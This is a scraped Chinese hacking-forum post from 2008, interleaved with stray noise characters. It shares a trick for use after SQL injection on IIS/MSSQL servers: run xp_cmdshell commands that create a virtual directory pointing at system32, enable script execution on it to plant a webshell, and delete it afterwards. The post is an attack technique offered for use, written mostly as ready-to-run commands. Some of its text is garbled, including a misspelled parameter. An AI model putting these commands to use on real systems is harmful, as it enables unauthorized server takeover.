|
- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
   
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:1 z& @ }# L# \
" d) B5 q" n( q6 a3 Yexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
7 R' x' m+ Z: X+ Y7 z' O4 J1 K7 e建立虚拟目录win,指向c:\windows\system323 {4 a, x* ]/ n/ q
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
9 `) ]) _; y3 @* Z* F' ~. _让win句有解析asp脚本权限+ N' q( {, Y/ z. @
; a1 t6 F% a0 eexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
' Y3 ]5 ^2 P N s/ U8 u% ]5 m删除虚拟目录。0 r- `2 J& d! S( }6 D
找不到web绝对路径的一种解决办法," p; ^4 s8 G+ k9 E+ N) D
: P' L0 d7 k1 n* f8 I$ v$ |
403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|
发表于 2008-10-22 14:38
| 
